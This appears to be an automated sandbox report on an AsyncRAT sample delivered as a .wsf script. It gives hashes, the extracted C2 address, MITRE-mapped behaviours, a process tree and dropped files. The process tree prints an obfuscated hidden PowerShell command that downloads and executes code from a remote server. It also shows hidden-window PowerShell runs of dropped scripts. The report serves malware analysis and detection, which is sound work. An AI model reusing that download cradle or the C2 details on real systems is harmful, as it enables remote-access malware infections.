asyncrat | cc3142e5a57ed925b842b9518b73dd50bf2e670ca954cffcec931adaf2c7f943

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28/01/2025, 12:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cc3142e5a57ed925b842b9518b73dd50bf2e670ca954cffcec931adaf2c7f943.wsf
Size

259KB
MD5

79615b779cd90313367de9f6b05eb87e
SHA1

d4b2b0caffacb205898c6590eb28840933535d97
SHA256

cc3142e5a57ed925b842b9518b73dd50bf2e670ca954cffcec931adaf2c7f943
SHA512

b07ab709a4431031f7e2e939ff82572accb8bbe6464479c8e9bfc399aec7da233c21f901d9a8d952fe077486c579b1de0d24f1632f96ec1ba39b81f6736fb9db
SSDEEP

3072:6XGxpnyPWD4v6V2BBGKBukGl4a3j3iFNj6pWFAc8ytiO8ywbv7r3SopyPCEXQkPK:Rt5M6c/n1x/rzAcfqys28Eq59CY

Score

10^/10

asyncrat 00000001 discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

00000001

81.10.39.58:7077

Mutex

AsyncMutex_alosh

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Blocklisted process makes network request 6 IoCs

flow	pid	Process
4	1212	WScript.exe
5	1212	WScript.exe
7	1212	WScript.exe
21	2960	powershell.exe
36	2960	powershell.exe
39	2960	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2960	powershell.exe
1540	powershell.exe
4916	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	api.ipify.org
36	api.ipify.org

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1540 set thread context of 4468	1540	powershell.exe	95
PID 4916 set thread context of 4424	4916	powershell.exe	109

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_compiler.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
2960	powershell.exe
2960	powershell.exe
1540	powershell.exe
1540	powershell.exe
4468	aspnet_compiler.exe
4916	powershell.exe
4916	powershell.exe
4916	powershell.exe
4916	powershell.exe

Suspicious use of AdjustPrivilegeToken 46 IoCs

description	pid	Process
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	powershell.exe
Token: SeSecurityPrivilege	2960	powershell.exe
Token: SeTakeOwnershipPrivilege	2960	powershell.exe
Token: SeLoadDriverPrivilege	2960	powershell.exe
Token: SeSystemProfilePrivilege	2960	powershell.exe
Token: SeSystemtimePrivilege	2960	powershell.exe
Token: SeProfSingleProcessPrivilege	2960	powershell.exe
Token: SeIncBasePriorityPrivilege	2960	powershell.exe
Token: SeCreatePagefilePrivilege	2960	powershell.exe
Token: SeBackupPrivilege	2960	powershell.exe
Token: SeRestorePrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeSystemEnvironmentPrivilege	2960	powershell.exe
Token: SeRemoteShutdownPrivilege	2960	powershell.exe
Token: SeUndockPrivilege	2960	powershell.exe
Token: SeManageVolumePrivilege	2960	powershell.exe
Token: 33	2960	powershell.exe
Token: 34	2960	powershell.exe
Token: 35	2960	powershell.exe
Token: 36	2960	powershell.exe
Token: SeIncreaseQuotaPrivilege	2960	powershell.exe
Token: SeSecurityPrivilege	2960	powershell.exe
Token: SeTakeOwnershipPrivilege	2960	powershell.exe
Token: SeLoadDriverPrivilege	2960	powershell.exe
Token: SeSystemProfilePrivilege	2960	powershell.exe
Token: SeSystemtimePrivilege	2960	powershell.exe
Token: SeProfSingleProcessPrivilege	2960	powershell.exe
Token: SeIncBasePriorityPrivilege	2960	powershell.exe
Token: SeCreatePagefilePrivilege	2960	powershell.exe
Token: SeBackupPrivilege	2960	powershell.exe
Token: SeRestorePrivilege	2960	powershell.exe
Token: SeShutdownPrivilege	2960	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe
Token: SeSystemEnvironmentPrivilege	2960	powershell.exe
Token: SeRemoteShutdownPrivilege	2960	powershell.exe
Token: SeUndockPrivilege	2960	powershell.exe
Token: SeManageVolumePrivilege	2960	powershell.exe
Token: 33	2960	powershell.exe
Token: 34	2960	powershell.exe
Token: 35	2960	powershell.exe
Token: 36	2960	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	4468	aspnet_compiler.exe
Token: SeDebugPrivilege	4916	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4468	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 1212 wrote to memory of 2960	1212	WScript.exe	82
PID 1212 wrote to memory of 2960	1212	WScript.exe	82
PID 216 wrote to memory of 1588	216	WScript.exe	86
PID 216 wrote to memory of 1588	216	WScript.exe	86
PID 1588 wrote to memory of 4640	1588	net.exe	90
PID 1588 wrote to memory of 4640	1588	net.exe	90
PID 216 wrote to memory of 3920	216	WScript.exe	91
PID 216 wrote to memory of 3920	216	WScript.exe	91
PID 3920 wrote to memory of 1540	3920	cmd.exe	93
PID 3920 wrote to memory of 1540	3920	cmd.exe	93
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 1540 wrote to memory of 4468	1540	powershell.exe	95
PID 632 wrote to memory of 436	632	WScript.exe	102
PID 632 wrote to memory of 436	632	WScript.exe	102
PID 436 wrote to memory of 748	436	net.exe	104
PID 436 wrote to memory of 748	436	net.exe	104
PID 632 wrote to memory of 1168	632	WScript.exe	105
PID 632 wrote to memory of 1168	632	WScript.exe	105
PID 1168 wrote to memory of 4916	1168	cmd.exe	107
PID 1168 wrote to memory of 4916	1168	cmd.exe	107
PID 4916 wrote to memory of 4052	4916	powershell.exe	108
PID 4916 wrote to memory of 4052	4916	powershell.exe	108
PID 4916 wrote to memory of 4052	4916	powershell.exe	108
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109
PID 4916 wrote to memory of 4424	4916	powershell.exe	109

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\cc3142e5a57ed925b842b9518b73dd50bf2e670ca954cffcec931adaf2c7f943.wsf"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WIND HIDDeN -eXeC BYPASS -NONI Sleep 2;[BYTe[]];$g45e='IeX(NeW-OBJeCT NeT.W';$df54='eBCLIeNT).DOWNLO';$5s4d='repoooos(''http://81.10.39.58:8080/test//Update.php'')'.RePLACe('repoooos','ADSTRING');Sleep 1;IeX($g45e+$df54+$5s4d);
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\wo4uJI2yVk.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:216
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1588
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:4640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\wo4uJI2yVk.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\wo4uJI2yVk.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1540
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:4468

C:\Windows\System32\WScript.exe
C:\Windows\System32\WScript.exe "C:\Users\Public\Music\wo4uJI2yVk.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:632
- C:\Windows\System32\net.exe
  "C:\Windows\System32\net.exe" session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:436
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Music\wo4uJI2yVk.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1168
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Music\wo4uJI2yVk.ps1'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      PID:4052
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7e521614944a4b380196880d6e64c960

SHA1
fd6de407ee23a9adbd73b3cd981d00097b58e4b2

SHA256
a43c1a1768dc9b337b5c7e4bdd0147fdc784067e1b1a731b08dd068b5114e12c

SHA512
0ce7556131a62805c2db2277613e9e29119f275fc453e0d77cfa84c7c934deb6079b0d39aacbedb88497988ec67448a76cbb69d907fd6d5dd6e0cf1e80b4d174

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hquiq5ro.lln.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Public\Music\wo4uJI2yVk.bat

Filesize
2KB

MD5
53e426ab359c2f08cdc63e0d22383bff

SHA1
8a743f7156c9af80ca11f2f140b442f7d63a3f29

SHA256
2643c127ce3561da9129f089eeb902a561c56287fe6809e3699d2eab6666131f

SHA512
5f830dc0e8eeae27dfb1d919648add393a3d5f49f573439a2d5b07df4abc7bd2323a3ebb7a4679640f0614d34152f85e33f29de8c0fe43ccea1ee8a6ceb51007

Download Submit
C:\Users\Public\Music\wo4uJI2yVk.ps1

Filesize
453KB

MD5
e4d7e0dbeebaf5813316403e8adabcf9

SHA1
1338b556dc95229331351d4a7db87a711961b9b1

SHA256
3cc0a770489f63fc3f4aec87a9b7ea5a7a731025ed211c9c42b5dd2f46692051

SHA512
eedfb6823afdd5d333bd096e406dd5077b49aea81166600098c7f840fd233e6e50fb577f8e9c1233a9b70ff28dd0c7458ff13afd58f344a263c9af0bb81b7c20

Download Submit
C:\Users\Public\Music\wo4uJI2yVk.vbs

Filesize
4KB

MD5
23e8b4a8552cc5d4a58cea8a08fca34f

SHA1
e9f820ccdfdeb033e497978eacc83ccb5c88b9b8

SHA256
c044c8f3d5f7b1c380b24b9bfda9f425bcaf5b82a941c58b3f5cde8b76582bbf

SHA512
78e32c63a73e90f25d0037be4ee91b7292931ae9f65af3b03a2fb3b90964e04a2c185d35a94bb310e6f2e28fcd415dd5a1e6e43754a4e7fe5a37bcc42e15c483

Download Submit
memory/1540-40-0x000002B92F090000-0x000002B92F09C000-memory.dmp

Filesize
48KB

Download
memory/2960-51-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-52-0x00000296665C0000-0x0000029666782000-memory.dmp

Filesize
1.8MB

Download
memory/2960-38-0x00007FFD78113000-0x00007FFD78115000-memory.dmp

Filesize
8KB

Download
memory/2960-39-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-19-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-25-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-58-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-13-0x0000029665ED0000-0x0000029665EF2000-memory.dmp

Filesize
136KB

Download
memory/2960-18-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-54-0x0000029666CC0000-0x00000296671E8000-memory.dmp

Filesize
5.2MB

Download
memory/2960-53-0x00007FFD78110000-0x00007FFD78BD1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-7-0x00007FFD78113000-0x00007FFD78115000-memory.dmp

Filesize
8KB

Download
memory/4468-41-0x0000000000400000-0x0000000000416000-memory.dmp

Filesize
88KB

Download
memory/4468-50-0x0000000006830000-0x0000000006896000-memory.dmp

Filesize
408KB

Download
memory/4468-49-0x0000000006D50000-0x0000000006DEC000-memory.dmp

Filesize
624KB

Download
memory/4468-46-0x0000000005CD0000-0x0000000005CDA000-memory.dmp

Filesize
40KB

Download
memory/4468-45-0x0000000005B40000-0x0000000005BD2000-memory.dmp

Filesize
584KB

Download
memory/4468-44-0x0000000005F10000-0x00000000064B4000-memory.dmp

Filesize
5.6MB

Download